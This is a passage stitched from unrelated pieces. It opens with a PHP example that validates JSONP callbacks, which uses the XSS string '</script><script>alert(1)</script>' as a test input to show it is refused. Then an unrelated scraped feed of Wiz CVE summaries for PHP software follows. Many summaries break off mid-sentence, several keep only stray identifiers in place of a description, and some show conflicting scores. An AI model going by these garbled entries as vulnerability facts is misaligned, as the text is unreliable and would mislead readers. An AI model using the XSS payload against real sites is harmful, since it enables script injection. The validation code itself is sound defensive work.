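// Added example, not YOURLS's code: validate a JSONP callback name and send
// the response with headers that keep it from being treated as HTML.

// A JavaScript identifier, optionally dotted (e.g. "jQuery123.cb"). Anything
// else is refused, so no markup can ever precede the JSON. Assumption: this
// grammar and the 64-byte cap cover every legitimate caller.
function isValidJsonpCallback(string $callback): bool
{
    return strlen($callback) <= 64
        && preg_match('/^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$/', $callback) === 1;
}

// Returns the response as an array so the pieces can be inspected; a real
// handler would emit the headers and echo the body.
function jsonResponse(array $payload, ?string $callback, int $status = 200): array
{
    // Hex-escape the characters that could close a <script> or attribute
    // if a proxy or browser ever mis-sniffs the body as HTML.
    $json = json_encode($payload, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    $common = ['X-Content-Type-Options: nosniff'];

    if ($callback === null || $callback === '') {
        return ['status' => $status,
                'headers' => array_merge(['Content-Type: application/json; charset=utf-8'], $common),
                'body' => $json];
    }
    if (!isValidJsonpCallback($callback)) {
        // Invalid callback: answer with plain JSON and never echo the value.
        return ['status' => 400,
                'headers' => array_merge(['Content-Type: application/json; charset=utf-8'], $common),
                'body' => json_encode(['error' => 'invalid callback'])];
    }
    // JSONP is script, so label it as such. The leading /**/ is the usual
    // guard against content-sniffing tricks that rely on the first bytes.
    return ['status' => $status,
            'headers' => array_merge(['Content-Type: application/javascript; charset=utf-8'], $common),
            'body' => "/**/{$callback}({$json});"];
}

// Constructed inputs: a normal jQuery-style callback and the advisory's
// vector, arbitrary markup supplied in ?callback=. The 403 case mirrors the
// private-mode response the advisory describes.
$payload = ['status' => 'fail', 'message' => 'unauthorized'];
foreach (['jQuery123_cb', '</script><script>alert(1)</script>'] as $cb) {
    $r = jsonResponse($payload, $cb, 403);
    echo $r['status'], ' ', $r['headers'][0], "\n", $r['body'], "\n\n";
}
```

The benign callback yields a `403` with a JavaScript content type and `/**/jQuery123_cb({...});` as the body; the markup payload yields a `400` whose body never contains the attacker's string. Both `nosniff` and the explicit content type matter for the private-mode case the advisory mentions: a 403 body is still a body, and without those headers a browser can be persuaded to render it.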
CVE-2026-32818 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 6.5)
## CVE-2026-32818 [MEDIUM]: PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, the forum module in Admidio does not verify whether the current user has permission to delete forum topics or posts. Both the topic_delete and post_delete actions in forum.php only validate the CSRF token but perform no authorization check before calling delete(). Any authenticated user with forum access can delete any topic (with all its posts) or any individual post by providing its UUID. This is inconsistent with the save/edit operations, which properly check isAdministratorForum() and ownership before allowing modifications. Any logged-in user can permanently and irreversibly delete any forum topic (including all its posts) or any individu
CVE-2026-34382 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 4.6)
## CVE-2026-34382 [MEDIUM]: PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. From version 5.0.0 to before version 5.0.8, the delete mode handler in mylist_function.php permanently deletes list configurations without validating a CSRF token. An attacker who can lure an authenticated user to a malicious page can silently destroy that user's list configurations — including organization-wide shared lists when the victim holds administrator rights. This issue has been patched in version 5.0.8.
Source: NVD
Score: 4.6 | Published: March 31, 2026 | Severity: MEDIUM | CNA Score: 4.6
Affected Technologies: PHP
Has Public Exploit: Yes | Has CISA KEV Exploit: No | CISA KEV Release Date: N/A | CISA KEV Due Date: N/A
EPSS percentile: 4.8
Ex
CVE-2023-53957 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 8.5)
## CVE-2023-53957 [HIGH]: PHP vulnerability analysis and mitigation
Kimai 1.30.10 contains a SameSite cookie vulnerability that allows attackers to steal user session cookies through malicious exploitation. Attackers can trick victims into executing a crafted PHP script that captures and writes session cookie information to a file, enabling potential session hijacking.
Source : NVD
Score 8.5
Published December 19, 2025
Severity HIGH
CNA Score 8.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 37.6
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
kimai/kimai
Sources
NVD
Composer Severity HIGH No Fix Added at: Feb 21, 2026
## CVE-2026-25892 [HIGH]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-25892 Impact, Exploitability, and Mitigation Steps (CVSS 7.5)
Adminer is open-source database management software. Adminer v5.4.1 and earlier has a version check mechanism where adminer.org sends signed version info via JavaScript postMessage, which the browser then POSTs to ?script=version. This endpoint lacks origin validation and accepts POST data from any source. An attacker can POST version[] parameter which PHP converts to an array. On next page load, openssl_verify() receives this array instead of string and throws TypeError, returning HTTP 500 to all users. Upgrade to Adminer 5.4.2.
Source : NVD
Score 7.5
Published February 9, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
Adminer
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/
## CVE-2026-31823 [MEDIUM]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-31823 Impact, Exploitability, and Mitigation Steps (CVSS 4.8)
Sylius is an Open Source eCommerce Framework on Symfony. An authenticated stored cross-site scripting (XSS) vulnerability exists in multiple places across the shop frontend and admin panel due to unsanitized entity names being rendered as raw HTML. Shop breadcrumbs (shared/breadcrumbs.html.twig): The breadcrumbs macro uses the Twig |raw filter on label values. Since taxon names, product names, and ancestor names flow directly into these labels, a malicious taxon name like is rendered and executed as JavaScript on the storefront. Admin product taxon picker (ProductTaxonTreeController.js): The rowRenderer method interpolates ${name} directly into a template literal building HTML, allowing script injection through taxon names in
## CVE-2025-63644 [MEDIUM]: PHP vulnerability analysis and mitigation
Wiz: CVE-2025-63644 Impact, Exploitability, and Mitigation Steps (CVSS 5.4)
A stored cross-site scripting (XSS) vulnerability exists in pH7Software pH7-Social-Dating-CMS 17.9.1 in the user profile Description field.
Source : NVD
Score 5.4
Published January 14, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
ph7software/ph7builder
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Jan 23, 2026
## CVE-2025-67849 [HIGH]: PHP vulnerability analysis and mitigation
Wiz: CVE-2025-67849 Impact, Exploitability, and Mitigation Steps (CVSS 7.3)
A flaw was found in Moodle. This cross-site scripting (XSS) vulnerability, caused by improper sanitization of AI prompt responses, allows attackers to inject malicious HTML or script into web pages. When other users view these compromised pages, their sessions could be stolen, or the user interface could be manipulated.
Source : NVD
Score 6.1
Published February 3, 2026
Severity MEDIUM
CNA Score 7.3
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
moodle/moodle
moodle
Sources
NVD
Composer Severity HIGH Has Fix Add
## CVE-2026-34394 [HIGH]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-34394 Impact, Exploitability, and Mitigation Steps (CVSS 8.1)
WWBN AVideo is an open source video platform. In versions 26.0 and prior, AVideo's admin plugin configuration endpoint (admin/save.json.php) lacks any CSRF token validation. There is no call to isGlobalTokenValid() or verifyToken() before processing the request. Combined with the application's explicit SameSite=None cookie policy, an attacker can forge cross-origin POST requests from a malicious page to overwrite arbitrary plugin settings on a victim administrator's session. Because the plugins table is included in the ignoreTableSecurityCheck() array in objects/Object.php, standard table-level access controls are also bypassed. This allows a complete takeover of platform functionality by reconfiguring payment processors, auth
## CVE-2026-34559 [CRITICAL]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-34559 Impact, Exploitability, and Mitigation Steps (CVSS 9.1)
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when creating or editing blog tags. An attacker can inject a malicious JavaScript payload into the tag name field, which is then stored server-side. This stored payload is later rendered unsafely across public tag pages and administrative interfaces without proper output encoding, leading to stored cross-site scripting (XSS). This issue has been patched in version 0.31.0.0.
Source : NVD
Score 9.1
Published April 1, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
PHP
Has Pu
## GHSA-44px-qjjc-xrhq [MEDIUM]: PHP vulnerability analysis and mitigation
Wiz: GHSA-44px-qjjc-xrhq Impact, Exploitability, and Mitigation Steps (CVSS 5.3)
## Summary
assets/preview-file
previewHtml
assetId
canView
false
## Details
assets/preview-file
assetId
The action does not enforce per-asset view authorization prior to returning preview content.
As a result, an authenticated user without asset-view permission can still obtain private preview output. This affects Craft installations with authenticated users of mixed privilege levels and private assets.
## Resources
d30df3112220db1ffd6726a3ed11857014c7fb27
b1cddf72c98a
Source : NVD
Score 1.3
Published March 26, 2026
Severity LOW
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability P
## CVE-2026-24765 [HIGH]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-24765 Impact, Exploitability, and Mitigation Steps (CVSS 7.8)
cleanupForCoverage()
.coverage
.coverage
allowed_classes
__wakeup()
['allowed_classes' => false]
.coverage
.coverage
Source : NVD
Score 7.8
Published January 27, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 31.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
phpunit9
phpunit10
Sources
NVD
Alpine 3.18, 3.19, 3.20, 3.21, 3.22, 3.23, edge Severity HIGH No Fix Added at: Mar 03, 2026
Debian 11, 13, 14 Severity HIGH Has Fix Added at: Jan 28, 2026
Debian 12 Severity MEDIUM No Fix Added at: Jan 28, 2026
Echo Severity HIGH Ha
## CVE-2026-33043 [HIGH]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-33043 Impact, Exploitability, and Mitigation Steps (CVSS 8.1)
WWBN AVideo is an open source video platform. In versions 25.0 and below, /objects/phpsessionid.json.php exposes the current PHP session ID to any unauthenticated request. The allowOrigin() function reflects any Origin header back in Access-Control-Allow-Origin with Access-Control-Allow-Credentials: true, enabling cross-origin session theft and full account takeover. This issue has been fixed in version 26.0.
Source : NVD
Score 8.1
Published March 20, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.3
Exploitation Probability (EPSS) N/A
Affected packages and l
## CVE-2026-0859 [MEDIUM]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-0859 Impact, Exploitability, and Mitigation Steps (CVSS 5.2)
TYPO3's mail-file spool deserialization flaw lets local users with write access to the spool directory craft a malicious file that is deserialized during the mailer:spool:send command, enabling arbitrary PHP code execution on the web server. This issue affects TYPO3 CMS versions 10.0.0-10.4.54, 11.0.0-11.5.48, 12.0.0-12.4.40, 13.0.0-13.4.22 and 14.0.0-14.0.1.
Source : NVD
Score 5.2
Published January 13, 2026
Severity MEDIUM
CNA Score 5.2
Affected Technologies
PHP
Typo3
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
typo3/cms-core
cpe:2.3:a:typo3:
## CVE-2026-32313 [HIGH]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-32313 Impact, Exploitability, and Mitigation Steps (CVSS 8.2)
xmlseclibs is a library written in PHP for working with XML Encryption and Signatures. Prior to 3.1.5, XML nodes encrypted with either aes-128-gcm, aes-192-gcm, or aes-256-gcm lack validation of the authentication tag length. An attacker can use this to brute-force an authentication tag, recover the GHASH key, and decrypt the encrypted nodes. It also allows forging arbitrary ciphertexts without knowing the encryption key. This vulnerability is fixed in 3.1.5.
Source : NVD
Score 8.2
Published March 16, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
PHP
Chainguard
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9
## CVE-2026-25482 [MEDIUM]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-25482 Impact, Exploitability, and Mitigation Steps (CVSS 6.2)
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored DOM XSS vulnerability exists in the "Recent Orders" dashboard widget. The Order Status Name is rendered via JavaScript string concatenation without proper escaping, allowing script execution when any admin visits the dashboard. This issue has been patched in versions 4.10.1 and 5.5.2.
Source : NVD
Score 6.2
Published February 3, 2026
Severity MEDIUM
CNA Score 6.2
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.6
Exploitation Probability (EPSS) N/A
Affected packages an
## CVE-2026-34598 [HIGH]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-34598 Impact, Exploitability, and Mitigation Steps (CVSS 7.1)
YesWiki is a wiki system written in PHP. Prior to version 4.6.0, a stored and blind XSS vulnerability exists in the form title field. A malicious attacker can inject JavaScript without any authentication via a form title that is saved in the backend database. When any user visits that injected page, the JavaScript payload gets executed. This issue has been patched in version 4.6.0.
Source : NVD
Score 7.1
Published April 2, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 19.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
yeswiki/yeswiki
So
## CVE-2026-33763 [MEDIUM]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-33763 Impact, Exploitability, and Mitigation Steps (CVSS 5.3)
get_api_video_password_is_correct
passwordIsCorrect
Source : NVD
Score 5.3
Published March 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 29, 2026
## GHSA-fmg6-246m-9g2v [MEDIUM]: PHP vulnerability analysis and mitigation
Wiz: GHSA-fmg6-246m-9g2v Impact, Exploitability, and Mitigation Steps (CVSS 5.3)
## Impact
In applications built with the Auth0 PHP SDK, cookies are encrypted with insufficient entropy, which may result in threat actors brute-forcing the encryption key and forging session cookies.
## Am I Affected?
You are affected if you meet the following preconditions:
Applications using laravel-auth0 SDK, versions between 7.0.0 and 7.20.0
Laravel-auth0 SDK using the Auth0-PHP SDK versions between 8.0.0 and 8.18.0.
## Resolution
Upgrade Auth0/laravel-auth0 to version 7.21.0 or greater.
Source : NVD
Score 8.2
Published April 3, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitat
## CVE-2026-33238 [MEDIUM]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-33238 Impact, Exploitability, and Mitigation Steps (CVSS 4.3)
listFiles.json.php
path
glob()
.mp4
Source : NVD
Score 4.3
Published March 21, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 20, 2026
## CVE-2026-33541 [MEDIUM]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-33541 Impact, Exploitability, and Mitigation Steps (CVSS 6.5)
TSPortal is the WikiTide Foundation’s in-house platform used by the Trust and Safety team to manage reports, investigations, appeals, and transparency work. Prior to version 34, a flaw in TSPortal allowed attackers to create arbitrary user records in the database by abusing validation logic. While validation correctly rejected invalid usernames, a side effect within a validation rule caused user records to be created regardless of whether the request succeeded. This could be exploited to cause uncontrolled database growth, leading to a potential denial of service (DoS). Version 34 contains a fix for the issue.
Source : NVD
Score 6.5
Published March 26, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
## CVE-2026-35539 [MEDIUM]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-35539 Impact, Exploitability, and Mitigation Steps (CVSS 5.3)
An issue was discovered in Roundcube Webmail before 1.5.14 and 1.6.14. XSS exists because of insufficient HTML attachment sanitization in preview mode. A victim must preview a text/html attachment.
Source : NVD
Score 6.1
Published April 3, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
roundcube
roundcube/roundcubemail
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Apr 05, 2026
Echo Severity MEDIUM Has Fix Added at: Apr 05, 2026
Composer Severity
## CVE-2026-33681 [HIGH]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-33681 Impact, Exploitability, and Mitigation Steps (CVSS 7.2)
objects/pluginRunDatabaseScript.json.php
name
Plugin::getDatabaseFileName()
install/install.sql
Source : NVD
Score 7.2
Published March 23, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 26, 2026
## CVE-2026-25759 [HIGH]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-25759 Impact, Exploitability, and Mitigation Steps (CVSS 8.7)
Statamic is a Laravel and Git powered content management system (CMS). From 6.0.0 to before 6.2.3, a stored XSS vulnerability in content titles allows authenticated users with content creation permissions to inject malicious JavaScript that executes when viewed by higher-privileged users. The malicious user must have an account with control panel access and content creation permissions. This vulnerability can be exploited to allow super admin accounts to be created. This has been fixed in 6.2.3.
Source : NVD
Score 8.7
Published February 11, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probabil
## CVE-2026-34561 [MEDIUM]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-34561 Impact, Exploitability, and Mitigation Steps (CVSS 4.7)
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within System Settings – Social Media Management. Multiple configuration fields, including Social Media and Social Media Link, accept attacker-controlled input that is stored server-side and later rendered without proper output encoding. This issue has been patched in version 0.31.0.0.
Source : NVD
Score 4.7
Published April 1, 2026
Severity MEDIUM
CNA Score 4.7
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
## CVE-2026-34974 [MEDIUM]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-34974 Impact, Exploitability, and Mitigation Steps (CVSS 5.4)
phpMyFAQ is an open source FAQ web application. Prior to version 4.1.1, the regex-based SVG sanitizer in phpMyFAQ (SvgSanitizer.php) can be bypassed using HTML entity encoding in javascript: URLs within SVG attributes. Any user with edit_faq permission can upload a malicious SVG that executes arbitrary JavaScript when viewed, enabling privilege escalation from editor to full admin takeover. This issue has been patched in version 4.1.1.
Source : NVD
Score 5.4
Published April 2, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.5
Exploitation Probability (EPSS)
## CVE-2026-2897 [MEDIUM]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-2897 Impact, Exploitability, and Mitigation Steps (CVSS 4.8)
A security vulnerability has been detected in funadmin up to 7.1.0-rc4. This vulnerability affects unknown code of the file app/backend/view/index/index.html of the component Backend Interface. The manipulation of the argument Value leads to cross site scripting. The attack can be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
Score 4.8
Published February 22, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.5
Exploitatio
## CVE-2026-25485 [MEDIUM]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-25485 Impact, Exploitability, and Mitigation Steps (CVSS 6.2)
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator’s browser. This occurs because the Shipping Categories (Name & Description) fields in the Store Management section are not properly sanitized before being displayed in the admin panel. This issue has been patched in versions 4.10.1 and 5.5.2.
Source : NVD
Score 6.2
Published February 3, 2026
Severity MEDIUM
CNA Score 6.2
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS)
## CVE-2026-34364 [MEDIUM]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-34364 Impact, Exploitability, and Mitigation Steps (CVSS 5.3)
categories.json.php
?user=
?user=
Source : NVD
Score 5.3
Published March 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 31, 2026
## CVE-2026-33351 [CRITICAL]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-33351 Impact, Exploitability, and Mitigation Steps (CVSS 9.1)
plugin/Live/standAloneFiles/saveDVR.json.php
$_REQUEST['webSiteRootURL']
file_get_contents()
Source : NVD
Score 9.1
Published March 23, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity CRITICAL No Fix Added at: Mar 20, 2026
## CVE-2026-29175 [HIGH]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-29175 Impact, Exploitability, and Mitigation Steps (CVSS 8.6)
Craft Commerce is an ecommerce platform for Craft CMS. Prior to 5.5.3, Stored XSS vulnerabilities exist in the Commerce Inventory page. The Product Title, Variant Title, and Variant SKU fields are rendered without proper HTML escaping, allowing an attacker to execute arbitrary JavaScript when any user (including administrators) views the inventory management page. This vulnerability is fixed in 5.5.3.
Source : NVD
Score 8.6
Published March 10, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
## CVE-2026-32600 [HIGH]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-32600 Impact, Exploitability, and Mitigation Steps (CVSS 8.2)
xml-security is a library that implements XML signatures and encryption. Prior to versions 2.3.1 and 1.13.9, XML nodes encrypted with either aes-128-gcm, aes-192-gcm, or aes-256-gcm lack validation of the authentication tag length. An attacker can use this to brute-force an authentication tag, recover the GHASH key, and decrypt the encrypted nodes. It also allows forging arbitrary ciphertexts without knowing the encryption key. This vulnerability is fixed in 2.3.1 and 1.13.9.
Source : NVD
Score 8.2
Published March 16, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EP
## CVE-2026-23626 [MEDIUM]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-23626 Impact, Exploitability, and Mitigation Steps (CVSS 6.8)
DefaultPolicy
Source : NVD
Score 6.8
Published January 18, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 18.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
kimai/kimai
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Jan 21, 2026
## CVE-2025-69198 [MEDIUM]: PHP vulnerability analysis and mitigation
Wiz: CVE-2025-69198 Impact, Exploitability, and Mitigation Steps (CVSS 6.0)
Pterodactyl is a free, open-source game server management panel. Pterodactyl implements rate limits that are applied to the total number of resources (e.g. databases, port allocations, or backups) that can exist for an individual server. These resource limits are applied on a per-server basis, and validated during the request cycle. However, in versions prior to 1.12.0, it is possible for a malicious user to send a massive volume of requests at the same time that would create more resources than the server is allotted. This is because the validation occurs early in the request cycle and does not lock the target resource while it is processing. As a result sending a large volume of requests at the same time would lead all of th
## CVE-2026-23997 [HIGH]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-23997 Impact, Exploitability, and Mitigation Steps (CVSS 8.0)
FacturaScripts is open-source enterprise resource planning and accounting software. In 2025.71 and earlier, a Stored Cross-Site Scripting (XSS) vulnerability was discovered in the Observations field. The flaw occurs in the History view, where historical data is rendered without proper HTML entity encoding. This allows an attacker to execute arbitrary JavaScript in the browser of administrators viewing the history.
Source : NVD
Score 9
Published February 2, 2026
Severity CRITICAL
CNA Score 8.0
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.9
Exploitation Probability (EPSS) N/A
Affected pa
## CVE-2026-33767 [HIGH]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-33767 Impact, Exploitability, and Mitigation Steps (CVSS 7.1)
objects/like.php
getLike()
?
users_id
$this->videos_id
videos_id
Source : NVD
Score 7.1
Published March 27, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 29, 2026
## CVE-2026-27732 [HIGH]: PHP vulnerability analysis and mitigation
Wiz: CVE-2026-27732 Impact, Exploitability, and Mitigation Steps (CVSS 8.6)
aVideoEncoder.json.php
downloadURL
Source : NVD
Score 8.6
Published February 24, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 02, 2026
## CVE-2025-69210 [LOW]: PHP vulnerability analysis and mitigation
Wiz: CVE-2025-69210 Impact, Exploitability, and Mitigation Steps (CVSS 1.2)
FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.7, a stored cross-site scripting (XSS) vulnerability exists in the product file upload functionality. Authenticated users can upload crafted XML files containing executable JavaScript. These files are later rendered by the application without sufficient sanitization or content-type enforcement, allowing arbitrary JavaScript execution when the file is accessed. Because product files uploaded by regular users are visible to administrative users, this vulnerability can be leveraged to execute malicious JavaScript in an administrator’s browser session. Version 2025.7 fixes the issue.
Source : NVD
## 1.2
Score
Wiz
CVE-2026-32812 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-32812 [MEDIUM] CVE-2026-32812 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32812 :
PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, unrestricted URL fetch in the SSO Metadata API can result in SSRF and local file reads. The SSO Metadata fetch endpoint at modules/sso/fetch_metadata.php accepts an arbitrary URL via $_GET['url'], validates it only with PHP's FILTER_VALIDATE_URL, and passes it directly to file_get_contents(). FILTER_VALIDATE_URL accepts file://, http://, ftp://, data://, and php:// scheme URIs. An authenticated administrator can use this endpoint to read arbitrary local files via the file:// wrapper (Local File Read), reach internal services via http:// (SSRF), or fetch cloud instance metadata. The full response body is returned verbatim to the caller. This is
Wiz
GHSA-595p-g7xc-c333 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-595p-g7xc-c333 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-595p-g7xc-c333 :
PHP vulnerability analysis and mitigation
